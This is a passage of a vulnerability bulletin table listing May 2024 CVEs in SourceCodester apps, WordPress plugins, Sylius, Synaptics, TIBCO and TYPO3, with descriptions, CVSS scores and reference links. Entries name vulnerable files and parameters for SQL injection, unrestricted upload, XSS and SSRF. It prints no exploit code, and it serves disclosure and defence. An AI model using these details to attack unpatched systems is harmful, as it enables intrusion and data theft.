<td>A vulnerability classified as critical has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. Affected is an unknown function of the file /employee_gatepass/classes/Users.php?f=ssave. The manipulation of the argument img leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264456.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4921&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4921" target="_blank">CVE-2024-4921</a><br><a href="https://github.com/I-Schnee-I/cev/blob/main/upload.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264456" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264456" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333662" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Gas Agency Management System<br> </td>
<td>A vulnerability has been found in SourceCodester Gas Agency Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file edituser.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264748.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5051&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5051" target="_blank">CVE-2024-5051</a><br><a href="https://github.com/HuoMingZ/aoligei/blob/main/Gas.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264748" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264748" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.336010" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Interactive Map with Marker<br> </td>
<td>A vulnerability was found in SourceCodester Interactive Map with Marker 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /endpoint/delete-mark.php. The manipulation of the argument mark leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264535.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4967&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4967" target="_blank">CVE-2024-4967</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/Interactive%20Map%20App/Interactive%20Map%20App%20-%20SQL%20Injection.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264535" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264535" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335190" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Online Art Gallery Management System<br> </td>
<td>A vulnerability was found in SourceCodester Online Art Gallery Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/adminHome.php. The manipulation of the argument sliderpic leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264481 was assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4946&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4946" target="_blank">CVE-2024-4946</a><br><a href="https://github.com/CveSecLook/cve/issues/29" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264481" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264481" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.334215" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Online Birth Certificate Management System<br> </td>
<td>A vulnerability was found in SourceCodester Online Birth Certificate Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264742 is the identifier assigned to this vulnerability.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5045&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5045" target="_blank">CVE-2024-5045</a><br><a href="https://github.com/HuoMingZ/aoligei/blob/main/yuzu.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264742" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264742" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335384" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Online Computer and Laptop Store<br> </td>
<td>A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this issue is some unknown functionality of the file /admin/maintenance/manage_brand.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263918 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4798&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4798" target="_blank">CVE-2024-4798</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/sql5.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263918" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263918" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332784" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Online Computer and Laptop Store<br> </td>
<td>A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/SystemSettings.php?f=update_settings. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263941 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4820&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4820" target="_blank">CVE-2024-4820</a><br><a href="https://github.com/jxm68868/cve/blob/main/upload.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263941" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263941" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333272" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Open Source Clinic Management System<br> </td>
<td>A vulnerability has been found in SourceCodester Open Source Clinic Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file setting.php. The manipulation of the argument logo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263929 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4809&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4809" target="_blank">CVE-2024-4809</a><br><a href="https://github.com/CveSecLook/cve/issues/26" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263929" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263929" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332581" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--School Intramurals Student Attendance Management System<br> </td>
<td>A vulnerability was found in SourceCodester School Intramurals Student Attendance Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /intrams_sams/manage_course.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264461 was assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4925&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4925" target="_blank">CVE-2024-4925</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/sql6.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264461" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264461" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333875" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--School Intramurals Student Attendance Management System<br> </td>
<td>A vulnerability was found in SourceCodester School Intramurals Student Attendance Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /intrams_sams/manage_student.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264462 is the identifier assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4926&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4926" target="_blank">CVE-2024-4926</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/sql7.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264462" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264462" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333879" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Bidding System<br> </td>
<td>A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /simple-online-bidding-system/admin/ajax.php?action=save_product. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264463.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4927&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4927" target="_blank">CVE-2024-4927</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/upload2.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264463" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264463" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333891" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Bidding System<br> </td>
<td>A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /simple-online-bidding-system/admin/ajax.php?action=delete_category. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264464.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4928&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4928" target="_blank">CVE-2024-4928</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/sql8.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264464" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264464" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333893" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Bidding System<br> </td>
<td>A vulnerability classified as critical was found in SourceCodester Simple Online Bidding System 1.0. This vulnerability affects unknown code of the file /simple-online-bidding-system/index.php?page=view_prod. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264466 is the identifier assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4930&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4930" target="_blank">CVE-2024-4930</a><br><a href="https://github.com/rockersiyuan/CVE/blob/main/SourceCodester%20Simple%20Online%20Bidding%20System%20Sql%20Inject-1.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264466" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264466" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335343" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Bidding System<br> </td>
<td>A vulnerability, which was classified as critical, has been found in SourceCodester Simple Online Bidding System 1.0. This issue affects some unknown processing of the file /simple-online-bidding-system/admin/index.php?page=view_udet. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264467.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4931&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4931" target="_blank">CVE-2024-4931</a><br><a href="https://github.com/rockersiyuan/CVE/blob/main/SourceCodester%20Simple%20Online%20Bidding%20System%20Sql%20Inject-2.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264467" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264467" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335365" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Bidding System<br> </td>
<td>A vulnerability, which was classified as critical, was found in SourceCodester Simple Online Bidding System 1.0. Affected is an unknown function of the file /simple-online-bidding-system/admin/index.php?page=manage_user. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264468.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4932&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4932" target="_blank">CVE-2024-4932</a><br><a href="https://github.com/rockersiyuan/CVE/blob/main/SourceCodester%20Simple%20Online%20Bidding%20System%20Sql%20Inject-3.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264468" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264468" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335366" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Bidding System<br> </td>
<td>A vulnerability has been found in SourceCodester Simple Online Bidding System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /simple-online-bidding-system/admin/index.php?page=manage_product. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264469 was assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4933&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4933" target="_blank">CVE-2024-4933</a><br><a href="https://github.com/rockersiyuan/CVE/blob/main/SourceCodester%20Simple%20Online%20Bidding%20System%20Sql%20Inject-4.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264469" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264469" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335367" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Bidding System<br> </td>
<td>A vulnerability classified as problematic has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file /simple-online-bidding-system/admin/ajax.php?action=save_user. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264465 was assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4929&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4929" target="_blank">CVE-2024-4929</a><br><a href="https://github.com/Hefei-Coffee/cve/blob/main/csrf.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264465" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264465" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333894" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Simple Online Mens Salon Management System<br> </td>
<td>A vulnerability, which was classified as critical, has been found in SourceCodester Simple Online Mens Salon Management System 1.0. Affected by this issue is some unknown functionality of the file view_service.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264926 is the identifier assigned to this vulnerability.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5069&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5069" target="_blank">CVE-2024-5069</a><br><a href="https://github.com/menxin996/Cvehub/blob/main/Men&amp;apos;s%20Salon%20Management%20System%20%20view_service.php%20has%20Sqlinjection.pdf" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264926" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264926" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.336842" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Sparkle WP--Editorialmag<br> </td>
<td>Missing Authorization vulnerability in Sparkle WP Editorialmag editorialmag.This issue affects Editorialmag: from n/a through 1.1.9.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-32129&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-32129" target="_blank">CVE-2023-32129</a><br><a href="https://patchstack.com/database/vulnerability/editorialmag/wordpress-editorialmag-theme-1-1-9-authenticated-arbitrary-plugin-activation?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Stefano Lissa &amp; The Newsletter Team--Newsletter<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in Stefano Lissa &amp; The Newsletter Team Newsletter allows Functionality Bypass.This issue affects Newsletter: from n/a through 8.2.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30522&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30522" target="_blank">CVE-2024-30522</a><br><a href="https://patchstack.com/database/vulnerability/newsletter/wordpress-newsletter-plugin-8-2-0-ip-blacklist-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Strategy11 Form Builder Team--Formidable Forms<br> </td>
<td>Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Strategy11 Form Builder Team Formidable Forms allows Code Injection.This issue affects Formidable Forms: from n/a through 6.7.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23522&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23522" target="_blank">CVE-2024-23522</a><br><a href="https://patchstack.com/database/vulnerability/formidable/wordpress-formidable-forms-plugin-6-7-content-injection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>StylemixThemes--Cost Calculator Builder PRO<br> </td>
<td>Cost Calculator Builder Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to 3.1.72, via the send_demo_webhook() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4789&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4789" target="_blank">CVE-2024-4789</a><br><a href="https://stylemixthemes.com/cost-calculator-plugin/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c6840350-7ff4-4ec2-bf2b-94ce6f782537?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>Supsystic--Pricing Table by Supsystic<br> </td>
<td>Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Supsystic Pricing Table by Supsystic allows Code Injection.This issue affects Pricing Table by Supsystic: from n/a through 1.9.12.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32790&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32790" target="_blank">CVE-2024-32790</a><br><a href="https://patchstack.com/database/vulnerability/pricing-table-by-supsystic/wordpress-pricing-table-by-supsystic-plugin-1-9-12-content-injection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Swift Ideas--Swift Framework<br> </td>
<td>The Swift Framework plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the sf_edit_directory_item() function in all versions up to, and including, 2.7.31. This makes it possible for unauthenticated attackers to update arbitrary posts with arbitrary content. Unfortunately, we did not receive a response from the vendor to send over the vulnerability details.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3915&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3915" target="_blank">CVE-2024-3915</a><br><a href="https://swiftideas.com/swift-framework/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/855055d5-362e-4a92-9e9d-97eab328dcc3?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>Swift Ideas--Swift Framework<br> </td>
<td>The Swift Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes in all versions up to, and including, 2.7.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Unfortunately, we did not receive a response from the vendor to send over the vulnerability details.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3916&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3916" target="_blank">CVE-2024-3916</a><br><a href="https://swiftideas.com/swift-framework/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/57103f8e-0874-4e56-8571-254607ada21c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>Sylius--Sylius<br> </td>
<td>Sylius is an open source eCommerce platform. Prior to 1.12.16 and 1.13.1, there is a possibility to execute javascript code in the Admin panel. In order to perform an XSS attack input a script into Name field in which of the resources: Taxons, Products, Product Options or Product Variants. The code will be executed while using an autocomplete field with one of the listed entities in the Admin Panel. Also for the taxons in the category tree on the product form.The issue is fixed in versions: 1.12.16, 1.13.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34349&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34349" target="_blank">CVE-2024-34349</a><br><a href="https://github.com/Sylius/Sylius/commit/ba4b66da5af88cdb1bba6174de8bdf42f4853e12" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/Sylius/Sylius/security/advisories/GHSA-v2f9-rv6w-vw8r" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>Synaptics--Synaptics Fingerprint Driver<br> </td>
<td>Missing lock check in SynHsaService may create a use-after-free condition which causes abnormal termination of the service, resulting in denial of service for the Synaptics Hardware Support App.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-5447&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-5447" target="_blank">CVE-2023-5447</a><br><a href="https://www.synaptics.com/sites/default/files/2023-10/fingerprint-driver-HSAService-security-brief-2023-10-13.pdf" target="_blank">PSIRT@synaptics.com</a></td>
</tr>
<tr>
<td>TIBCO--Hawk<br> </td>
<td>Install-type password disclosure vulnerability in Universal Installer including the Silent Installer in TIBCO Hawk versions 6.2.0, 6.2.1, 6.2.2 and 6.2.3 allows user's Enterprise Message Service (EMS) password to be exposed outside of the hawkagent.cfg and hawkevent.cfg config files.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3182&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3182" target="_blank">CVE-2024-3182</a><br><a href="https://community.tibco.com/advisories/tibco-security-advisory-may-14-2024-tibco-hawk-cve-2024-3182-r213/" target="_blank">security@tibco.com</a></td>
</tr>
<tr>
<td>TYPO3--typo3<br> </td>
<td>TYPO3 is an enterprise content management system. Starting in version 9.0.0 and prior to versions 9.5.48 ELTS, 10.4.45 ELTS, 11.5.37 LTS, 12.4.15 LTS, and 13.1.1, the form manager backend module is vulnerable to cross-site scripting. Exploiting this vulnerability requires a valid backend user account with access to the form module. TYPO3 versions 9.5.48 ELTS, 10.4.45 ELTS, 11.5.37 LTS, 12.4.15 LTS, and 13.1.1 fix the problem described.</td>
<td>2024-05-14</td>
